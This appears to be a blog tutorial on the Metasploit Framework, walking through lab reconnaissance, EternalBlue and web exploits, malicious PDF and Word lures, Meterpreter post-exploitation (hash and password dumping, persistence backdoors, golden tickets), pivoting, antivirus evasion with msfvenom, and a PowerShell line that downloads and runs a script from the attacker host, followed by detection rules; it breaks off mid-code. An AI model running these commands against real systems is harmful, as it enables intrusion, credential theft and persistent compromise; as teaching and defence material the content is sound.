The days when security testing felt like a black art
Before I knew Metasploit, security testing was pure guesswork:
The old way of doing security testing:
```shell
# 1. Manual vulnerability scanning
nmap -sV -sC target.example.com
# ...and then fumble around wondering what to do next 😅
# 2. Random exploit attempts
# Google: "how to exploit apache 2.4.41"
# Copy-paste commands from a tutorial
curl -X POST "http://target.com/vulnerable_endpoint" -d "payload"
# 3. No systematic approach
# Test on a hunch with no idea what you will find
# No clear methodology
# 4. Limited exploit knowledge
# Only know SQL injection and XSS
# Unaware of advanced attack vectors
```
Problems I ran into all the time:
- No Standardized Methodology: no clearly defined steps
- Limited Exploit Database: could find a vulnerability but had no idea how to exploit it
- Manual Process: slow and inefficient
- No Payload Generation: did not know how to build custom payloads
- Poor Documentation: no system for recording test results
- Inconsistent Results: test results could not be trusted
An example of the confusion:
```shell
# Real situations that happened 😅
# 1. Found a vulnerability but had no idea how to exploit it
nmap -sV 192.168.1.100
# PORT   STATE SERVICE VERSION
# 21/tcp open  ftp     ProFTPD 1.3.5
# 22/tcp open  ssh     OpenSSH 7.4
# 80/tcp open  http    Apache httpd 2.4.41
# Google: "ProFTPD 1.3.5 exploit"
# Plenty of hits, but no idea which one actually works 😕
# 2. Payload does not work
# Copy-paste exploit code from the internet
python exploit.py 192.168.1.100
# Error: Connection refused
# Error: Payload failed
# No idea how to tune it, keep fumbling... 😞
# 3. No clear plan
# Start with a port scan
# Then wander off in whatever direction comes to mind
# No idea what should be tested next
```
Result: security testing that was inefficient and far from comprehensive! 😰
Until one day I discovered the Metasploit Framework and everything changed! 🎯
Metasploit Framework Fundamentals
1. Metasploit Architecture
Framework Components:
```text
┌─────────────────────────────────────────┐
│          Metasploit Framework           │
│                                         │
│  ┌─────────────┐     ┌─────────────┐    │
│  │  Exploits   │     │  Payloads   │    │
│  │  (2000+)    │     │   (500+)    │    │
│  └─────────────┘     └─────────────┘    │
│                                         │
│  ┌─────────────┐     ┌─────────────┐    │
│  │ Auxiliaries │     │  Encoders   │    │
│  │  (1000+)    │     │   (50+)     │    │
│  └─────────────┘     └─────────────┘    │
│                                         │
│  ┌─────────────┐     ┌─────────────┐    │
│  │    NOPs     │     │    Post     │    │
│  │   (10+)     │     │   (200+)    │    │
│  └─────────────┘     └─────────────┘    │
└─────────────────────────────────────────┘
```
Core Concepts:
- Exploits: code that takes advantage of a vulnerability
- Payloads: code that runs after an exploit succeeds
- Auxiliaries: supporting tools (scanners, fuzzers)
- Encoders: encode a payload to evade detection
- NOPs: No Operation instructions used for buffer alignment
- Post-exploitation: tools used after a system has been compromised
2. Metasploit Installation
```shell
# Kali Linux (pre-installed)
sudo apt update && sudo apt upgrade
msfconsole
# Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall
# Docker
docker pull metasploitframework/metasploit-framework
docker run --rm -it -v ~/.msf4:/home/msf/.msf4 -p 4444:4444 metasploitframework/metasploit-framework
```
3. Database Setup and Configuration
```shell
# Initialize the PostgreSQL database
sudo systemctl start postgresql
sudo -u postgres createuser msf -P -S -R -D
sudo -u postgres createdb -O msf msf
# Connect Metasploit to the database
msfconsole
msf6 > db_connect -y /usr/share/metasploit-framework/config/database.yml
# Check database status
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
# Rebuild the module cache (older releases only; Metasploit 5+ maintains the cache automatically)
msf6 > db_rebuild_cache
# Workspace management
msf6 > workspace
[*] Available workspaces:
[*] default
msf6 > workspace -a pentest_project_1
[*] Added workspace: pentest_project_1
[*] Workspace: pentest_project_1
msf6 > workspace pentest_project_1
[*] Workspace: pentest_project_1
```
Information Gathering and Reconnaissance
1. Network Discovery
```shell
# Nmap integration (results are stored in the workspace database)
msf6 > db_nmap -sS -A 192.168.1.0/24
[*] Nmap: Starting Nmap 7.94 ( https://nmap.org )
[*] Nmap: Nmap scan report for 192.168.1.100
[*] Nmap: Host is up (0.001s latency).
[*] Nmap: PORT    STATE SERVICE     VERSION
[*] Nmap: 21/tcp  open  ftp         ProFTPD 1.3.5
[*] Nmap: 22/tcp  open  ssh         OpenSSH 7.4p1
[*] Nmap: 80/tcp  open  http        Apache httpd 2.4.41
[*] Nmap: 139/tcp open  netbios-ssn Samba smbd 4.6.2
[*] Nmap: 445/tcp open  netbios-ssn Samba smbd 4.6.2
# View discovered hosts
msf6 > hosts
Hosts
=====
address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.100  00:0c:29:xx:xx:xx        Linux    Ubuntu     16.04  server
192.168.1.101  00:0c:29:yy:yy:yy        Windows  10                desktop
# View discovered services
msf6 > services
Services
========
host           port  proto  name         state  info
----           ----  -----  ----         -----  ----
192.168.1.100  21    tcp    ftp          open   ProFTPD 1.3.5
192.168.1.100  22    tcp    ssh          open   OpenSSH 7.4p1
192.168.1.100  80    tcp    http         open   Apache httpd 2.4.41
192.168.1.100  139   tcp    netbios-ssn  open   Samba smbd 4.6.2
192.168.1.100  445   tcp    netbios-ssn  open   Samba smbd 4.6.2
```
2. Service Enumeration
```shell
# SMB enumeration
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.100:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1)
[*] 192.168.1.100:445 - Host is running SMB 1.0 (vulnerable to EternalBlue!)
# HTTP enumeration
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run
[+] 192.168.1.100:80 Apache/2.4.41 (Ubuntu)
# Directory enumeration
msf6 > use auxiliary/scanner/http/dir_scanner
msf6 auxiliary(scanner/http/dir_scanner) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/dir_scanner) > set DICTIONARY /usr/share/metasploit-framework/data/wordlists/directory.txt
msf6 auxiliary(scanner/http/dir_scanner) > run
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/admin/
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/backup/
[+] 192.168.1.100:80 - Found http://192.168.1.100:80/uploads/
# FTP enumeration
msf6 > use auxiliary/scanner/ftp/ftp_version
msf6 auxiliary(scanner/ftp/ftp_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.1.100:21 - FTP Banner: '220 ProFTPD 1.3.5 Server ready.\x0d\x0a'
```
3. Vulnerability Assessment
```shell
# SMB vulnerability scan
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010! (EternalBlue)
[*] 192.168.1.100:445 - Scanned 1 of 1 hosts (100% complete)
# SSH vulnerability scan
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.1.100:22 - SSH server version: SSH-2.0-OpenSSH_7.4p1 Ubuntu-10ubuntu1.4
# Web application vulnerability scan (HTTP PUT allowed on a web-accessible directory)
msf6 > use auxiliary/scanner/http/http_put
msf6 auxiliary(scanner/http/http_put) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_put) > set PATH /uploads/
msf6 auxiliary(scanner/http/http_put) > run
[+] 192.168.1.100:80 - Upload succeeded on /uploads/ (201)
[+] 192.168.1.100:80 - File stored at http://192.168.1.100:80/uploads/msf_http_put_test.txt
```
Exploitation Techniques
1. EternalBlue (MS17-010) Exploitation
```shell
# Search for EternalBlue exploit
msf6 > search ms17-010
Matching Modules
================
   #  Name                                       Disclosure Date  Rank     Check  Description
   -  ----                                       ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command       2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Code Execution
   1  auxiliary/scanner/smb/smb_ms17_010         2017-03-14       normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue   2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Code Execution
   3  exploit/windows/smb/ms17_010_psexec        2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Code Execution
# Use EternalBlue exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s)
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        SMB Domain
   SMBPass                         no        SMB Password
   SMBUser                         no        SMB Username
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target
# Configure target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
# Check if target is vulnerable
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 192.168.1.101:445 - The target is vulnerable.
# Execute exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.101:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.1.101:445 - Host is likely VULNERABLE to MS17-010!
[*] 192.168.1.101:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.1.101:445 - The target is vulnerable.
[*] 192.168.1.101:445 - Connecting to target for exploitation.
[+] 192.168.1.101:445 - Connection established for exploitation.
[+] 192.168.1.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.101:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.1.101:445 - Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.50:4444 -> 192.168.1.101:49158)
meterpreter >
```
2. Web Application Exploitation
```shell
# PHP CGI argument injection (php-cgi query-string flag injection)
msf6 > use exploit/multi/http/php_cgi_arg_injection
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.1.100
msf6 exploit(multi/http/php_cgi_arg_injection) > set TARGETURI /vulnerable_app/
msf6 exploit(multi/http/php_cgi_arg_injection) > set payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.1.50
msf6 exploit(multi/http/php_cgi_arg_injection) > exploit
[*] Started reverse TCP handler on 192.168.1.50:4444
[*] 192.168.1.100:80 - Sending stage (39927 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.50:4444 -> 192.168.1.100:34567)
# Unrestricted file upload
msf6 > use exploit/unix/webapp/php_fileupload_exec
msf6 exploit(unix/webapp/php_fileupload_exec) > set RHOSTS 192.168.1.100
msf6 exploit(unix/webapp/php_fileupload_exec) > set TARGETURI /uploads/
msf6 exploit(unix/webapp/php_fileupload_exec) > set payload php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/php_fileupload_exec) > set LHOST 192.168.1.50
msf6 exploit(unix/webapp/php_fileupload_exec) > exploit
# Command execution through MSSQL with known credentials (xp_cmdshell)
msf6 > use auxiliary/admin/mssql/mssql_exec
msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.1.102
msf6 auxiliary(admin/mssql/mssql_exec) > set USERNAME sa
msf6 auxiliary(admin/mssql/mssql_exec) > set PASSWORD password123
msf6 auxiliary(admin/mssql/mssql_exec) > set CMD "whoami"
msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] 192.168.1.102:1433 - SQL Query: EXEC master..xp_cmdshell 'whoami'
[*] 192.168.1.102:1433 - Row Count: 1 (Status: 16 Command: 193)
[*] 192.168.1.102:1433 - | nt authority\system
```
3. Social Engineering Attacks
```shell
# Generate malicious PDF
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set LHOST 192.168.1.50
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > set FILENAME "Important_Document.pdf"
msf6 exploit(windows/fileformat/adobe_pdf_embedded_exe) > exploit
[*] Creating 'Important_Document.pdf' file...
[+] Important_Document.pdf stored at /home/kali/.msf4/local/Important_Document.pdf
# Generate malicious Office document
msf6 > use exploit/windows/fileformat/office_word_hta
msf6 exploit(windows/fileformat/office_word_hta) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/office_word_hta) > set LHOST 192.168.1.50
msf6 exploit(windows/fileformat/office_word_hta) > set FILENAME "Annual_Report.docx"
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Creating 'Annual_Report.docx' file...
[+] Annual_Report.docx stored at /home/kali/.msf4/local/Annual_Report.docx
# Setup listener for payload
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.1.50:4444
```
Post-Exploitation Activities
1. Meterpreter Basics
```shell
# Meterpreter session management
meterpreter > sysinfo
Computer        : WIN10-TARGET
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
# File system operations
meterpreter > pwd
C:\Users\victim\Desktop
meterpreter > ls
Listing: C:\Users\victim\Desktop
================================
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2024-01-15 14:30:25 +0700  desktop.ini
100777/rwxrwxrwx  1024  fil   2024-01-15 10:15:30 +0700  passwords.txt
100666/rw-rw-rw-  2048  fil   2024-01-15 09:45:12 +0700  secrets.docx
meterpreter > download passwords.txt /tmp/
[*] Downloading: passwords.txt -> /tmp/passwords.txt
[*] Downloaded 1.00 KiB of 1.00 KiB (100.0%): passwords.txt -> /tmp/passwords.txt
[*] Completed : passwords.txt -> /tmp/passwords.txt
meterpreter > upload /tmp/backdoor.exe C:\\Windows\\Temp\\
[*] Uploading : /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
[*] Uploaded 73.80 KiB of 73.80 KiB (100.0%): /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
[*] Completed : /tmp/backdoor.exe -> C:\Windows\Temp\backdoor.exe
# Process management
meterpreter > ps
Process List
============
 PID   PPID  Name              Arch  Session  User                 Path
 ---   ----  ----              ----  -------  ----                 ----
 0     0     [System Process]
 4     0     System            x64   0
 88    4     Registry          x64   0
 428   4     smss.exe          x64   0
 536   528   csrss.exe         x64   0
 1234  1180  explorer.exe      x64   1        WIN10-TARGET\victim  C:\Windows\explorer.exe
 2456  1234  notepad.exe       x64   1        WIN10-TARGET\victim  C:\Windows\System32\notepad.exe
meterpreter > migrate 1234
[*] Migrating from 3456 to 1234...
[*] Migration completed successfully.
```
2. Privilege Escalation
```shell
# Check current privileges
meterpreter > getuid
Server username: WIN10-TARGET\victim
# Get system information
meterpreter > run post/windows/gather/win_privs
[*] Current privileges:
[*] SeShutdownPrivilege
[*] SeChangeNotifyPrivilege
[*] SeUndockPrivilege
[*] SeIncreaseWorkingSetPrivilege
[*] SeTimeZonePrivilege
# Automatic privilege escalation
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 192.168.1.101 - Collecting local exploits for x64/windows...
[*] 192.168.1.101 - 31 exploit checks are being tried...
[+] 192.168.1.101 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.1.101 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target appears to be vulnerable.
# Use UAC bypass
meterpreter > background
[*] Backgrounding session 1...
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
msf6 exploit(windows/local/bypassuac_eventvwr) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_eventvwr) > set LHOST 192.168.1.50
msf6 exploit(windows/local/bypassuac_eventvwr) > set LPORT 5555
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 192.168.1.50:5555
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Sending stage (200774 bytes) to 192.168.1.101
[*] Meterpreter session 2 opened (192.168.1.50:5555 -> 192.168.1.101:49159)
meterpreter > getuid
Server username: WIN10-TARGET\victim
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
3. Credential Harvesting
```shell
# Dump password hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
victim:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
# Load Kiwi extension (Mimikatz)
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com  ***/
# Dump credentials from memory
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username  Domain        LM                                NTLM
--------  ------        --                                ----
victim    WIN10-TARGET  aad3b435b51404eeaad3b435b51404ee  8846f7eaee8fb117ad06bdd830b7586c
wdigest credentials
===================
Username         Domain        Password
--------         ------        --------
(null)           (null)        (null)
DESKTOP-ABC123$  WORKGROUP     (null)
victim           WIN10-TARGET  P@ssw0rd123!
# Search for credentials in files
meterpreter > run post/windows/gather/credentials/credential_collector
[*] Running module against WIN10-TARGET
[*] Extracting credentials from system...
[+] Found credentials in C:\Users\victim\Documents\passwords.txt
[+] Found credentials in registry...
```
4. Persistence Mechanisms
```shell
# Create persistent backdoor
meterpreter > run persistence -S -U -X -i 10 -p 6666 -r 192.168.1.50
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/kali/.msf4/logs/persistence/WIN10-TARGET_20240115.3456/WIN10-TARGET_20240115.3456.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=6666
[*] Persistent agent script is 612841 bytes long
[+] Persistent Script written to C:\Windows\TEMP\CyberSafe.vbs
[*] Starting connection handler at port 6666 for windows/meterpreter/reverse_tcp
[*] Persistent VBS script service installed on target
# Golden ticket attack (with domain admin privileges)
meterpreter > load kiwi
meterpreter > dcsync_ntlm krbtgt
[DC] 'domain.local' will be the domain
[DC] 'DC01.domain.local' will be the DC server
[DC] 'krbtgt' will be the user account
[*] Retrieving user information for krbtgt
Object RDN       : krbtgt
SAM Account name : krbtgt
Account SID      : S-1-5-21-123456789-123456789-123456789-502
Hash NTLM: a9b30e5b0dc865eadcea9411e4ade72d
meterpreter > golden_ticket_create -u Administrator -d domain.local -k a9b30e5b0dc865eadcea9411e4ade72d -s S-1-5-21-123456789-123456789-123456789 -t /tmp/golden.kirbi
[+] Golden ticket created successfully
# Registry persistence
meterpreter > reg setval -k "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" -v "Windows Update" -t REG_SZ -d "C:\\Windows\\Temp\\backdoor.exe"
[*] Successful set Windows Update.
```
Advanced Exploitation Techniques
1. Pivoting and Network Traversal
```shell
# Add route for internal network
meterpreter > run autoroute -s 10.0.0.0/24
[*] Adding a route to 10.0.0.0/255.255.255.0...
[+] Added route to 10.0.0.0/255.255.255.0 via 192.168.1.101
[*] Use the -p option to list all active routes
# Setup SOCKS proxy
meterpreter > background
[*] Backgrounding session 1...
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
msf6 auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the SOCKS proxy server
# Pivot through compromised host
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.0.0.5
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
# Port forwarding
meterpreter > portfwd add -l 3389 -p 3389 -r 10.0.0.5
[*] Local TCP relay created: :3389 <-> 10.0.0.5:3389
# Use proxychains for external tools
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 10.0.0.0/24
```
2. Evasion Techniques
```shell
# Encode payload to evade AV
msf6 > use payload/windows/meterpreter/reverse_tcp
msf6 payload(windows/meterpreter/reverse_tcp) > set LHOST 192.168.1.50
msf6 payload(windows/meterpreter/reverse_tcp) > set LPORT 4444
msf6 payload(windows/meterpreter/reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 10 -o /tmp/payload_encoded.exe
[*] Writing 73802 bytes to /tmp/payload_encoded.exe...
[*] Final size of exe file: 73802 bytes
# Custom payload with template
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -x /tmp/legitimate_app.exe -k -f exe -o /tmp/trojan.exe
# Staged vs stageless payload
# Staged (smaller, but requires callback)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o staged.exe
# Stageless (larger, but self-contained)
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o stageless.exe
# PowerShell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f psh-cmd
# Shellcode injection
meterpreter > migrate 1234
[*] Migrating from 5678 to 1234...
[*] Migration completed successfully.
# In-memory execution
meterpreter > execute -H -i -f powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.50/payload.ps1')"
```
3. Custom Module Development
```ruby
# custom_scanner.rb
# Save it as <module path>/auxiliary/scanner/http/custom_scanner.rb so that
# `loadpath` registers it as auxiliary/scanner/http/custom_scanner.
require 'msf/core'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'Custom Service Scanner',
      'Description' => 'Scans for custom service vulnerabilities',
      'Author'      => 'Your Name',
      'License'     => MSF_LICENSE
    )
    register_options([
      Opt::RPORT(8080),
      OptString.new('TARGETURI', [true, 'Path to scan', '/'])
    ])
  end

  # The Scanner mixin calls this once per host in RHOSTS
  def run_host(ip)
    connect
    request  = "GET #{datastore['TARGETURI']} HTTP/1.1\r\n"
    request << "Host: #{ip}\r\n"
    request << "User-Agent: Mozilla/5.0\r\n"
    request << "\r\n"
    sock.put(request)
    response = sock.get_once(1024) || ''
    if response =~ /CustomServer\/1\.0/
      print_good("#{ip}:#{rport} - Custom server detected")
      # Additional vulnerability checks here
    end
  rescue ::Rex::ConnectionError, ::Timeout::Error, ::EOFError => e
    # Rescue only connection-level errors; a bare ::Exception would also swallow Ctrl-C
    print_error("#{ip}:#{rport} - Error: #{e}")
  ensure
    disconnect
  end
end
```
```shell
# Load custom module
msf6 > loadpath /path/to/custom/modules
msf6 > reload_all
msf6 > use auxiliary/scanner/http/custom_scanner
msf6 auxiliary(scanner/http/custom_scanner) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/http/custom_scanner) > run
```
Reporting and Documentation
1. Automated Report Generation
```shell
# Generate workspace report
msf6 > workspace pentest_project_1
msf6 > db_export -f xml /tmp/pentest_results.xml
# Export specific data
msf6 > hosts -o /tmp/discovered_hosts.csv
msf6 > services -o /tmp/discovered_services.csv
msf6 > vulns -o /tmp/vulnerabilities.csv
msf6 > creds -o /tmp/credentials.csv
msf6 > loot -o /tmp/loot_files.csv
# Generate HTML report
msf6 > load auto_add_route
msf6 > load sounds
msf6 > load report_generation
msf6 > generate_report html /tmp/pentest_report.html
```
2. Custom Reporting Scripts
```ruby
#!/usr/bin/env ruby
# generate_report.rb
# Run from a metasploit-framework checkout: the framework's lib/ directory must be on
# the load path, and the database connection comes from config/database.yml.
msfbase = File.expand_path(File.dirname(__FILE__))
$LOAD_PATH.unshift(File.join(msfbase, 'lib'))
require 'msfenv'
require 'msf/base'

framework = Msf::Simple::Framework.create

# Connect to the database
framework.db.connect

# Report against the active workspace
workspace = framework.db.workspace
puts "=== PENETRATION TEST REPORT ==="
puts "Workspace: #{workspace.name}"
puts "Generated: #{Time.now}"
puts

# Hosts summary
hosts = framework.db.hosts
puts "=== DISCOVERED HOSTS (#{hosts.count}) ==="
hosts.each do |host|
  puts "#{host.address} - #{host.os_name} #{host.os_flavor}"
end
puts

# Services summary
services = framework.db.services
puts "=== DISCOVERED SERVICES (#{services.count}) ==="
services.group_by(&:port).sort.each do |port, svcs|
  puts "Port #{port}: #{svcs.map(&:name).compact.uniq.join(', ')}"
end
puts

# Vulnerabilities (a vuln may be recorded against a host with no service)
vulns = framework.db.vulns
puts "=== VULNERABILITIES (#{vulns.count}) ==="
vulns.each do |vuln|
  port = vuln.service ? ":#{vuln.service.port}" : ''
  puts "#{vuln.host.address}#{port} - #{vuln.name}"
end
puts

# Credentials: each entry is a Metasploit::Credential::Core with public (username)
# and private (secret) parts, either of which may be absent
creds = framework.db.creds
puts "=== CREDENTIALS (#{creds.count}) ==="
creds.each do |cred|
  puts "#{cred.public&.username} : #{cred.private&.data}"
end
```
3. Integration with External Tools
```shell
# Import into Metasploit Pro
msf6 > pro_import /tmp/nessus_results.nessus
# Integration with Nessus
msf6 > load nessus
msf6 > nessus_connect username:password@nessus.server.com:8834
msf6 > nessus_scan_new -t "Basic Network Scan" -n "Pentest Scan" 192.168.1.0/24
msf6 > nessus_report_vulns <scan_id>
# Integration with OpenVAS
msf6 > load openvas
msf6 > openvas_connect username password localhost 9392
msf6 > openvas_target_create "Pentest Target" "192.168.1.0/24" "Full and fast"
msf6 > openvas_task_start <task_id>
# Integration with Cobalt Strike
# Generate Cobalt Strike payload
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.1.50 LPORT=80 -f exe -o cs_beacon.exe
# Setup handler for Cobalt Strike beacons
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 80
msf6 exploit(multi/handler) > exploit -j
```
Defensive Considerations
1. Detection and Mitigation
```shell
# Indicators of Compromise (IOCs)
echo "=== METASPLOIT IOCs ===" > /tmp/iocs.txt
echo "Network connections to known Metasploit default ports (4444, 4445)" >> /tmp/iocs.txt
echo "Suspicious PowerShell execution with encoded commands" >> /tmp/iocs.txt
echo "Meterpreter process injection into legitimate processes" >> /tmp/iocs.txt
echo "Unusual network traffic patterns (reverse shells)" >> /tmp/iocs.txt
echo "Registry modifications in Run keys for persistence" >> /tmp/iocs.txt
```
```text
# Signatures for detection
# Snort rule for Meterpreter traffic
# (a bare content:"RECV" match fires on many legitimate protocols; constrain it with
#  ports, direction and flow options and validate it against your own traffic first)
alert tcp any any -> any any (msg:"Meterpreter Traffic Detected"; content:"RECV"; flow:established; sid:1000001;)
```
```yara
// YARA rule for Meterpreter payload strings
rule Meterpreter_Payload {
    meta:
        description = "Detects Meterpreter payload signatures"
        author = "Security Team"
    strings:
        $metsrv = "metsrv.dll" nocase
        $revtcp = "reverse_tcp" nocase
        $stage = "windows/meterpreter" nocase
    condition:
        any of them
}
```
```powershell
# PowerShell logging to detect suspicious activity
# Enable PowerShell script block logging (create the policy key first if it does not exist)
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1
# Monitor for suspicious PowerShell commands (event ID 4104 carries the script block text)
Get-WinEvent -FilterHashtable @{LogName="Microsoft-Windows-PowerShell/Operational"; ID=4104} | Where-Object {$_.Message -match "DownloadString|IEX|Invoke-Expression"}
```
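The IoC list and the Get-WinEvent filter above can be turned into a small detector that runs over exported log records. This is an added example, not code from the original post; the record field names (`source`, `dst_port`, `event_id`, `script_block`, `key`, `data`) and the sample records are constructed for the example and must be mapped onto your own SIEM's fields.

```python
"""Apply the Metasploit IoCs from the post to constructed log records.

Added example (not from the original post). Field names are assumptions of
this example, not a real log schema.
"""
import re
from dataclasses import dataclass

# Ports the post lists as Metasploit defaults. The post's own sessions also use
# 5555 and 6666, so treat this set as tunable rather than fixed.
DEFAULT_MSF_PORTS = {4444, 4445}

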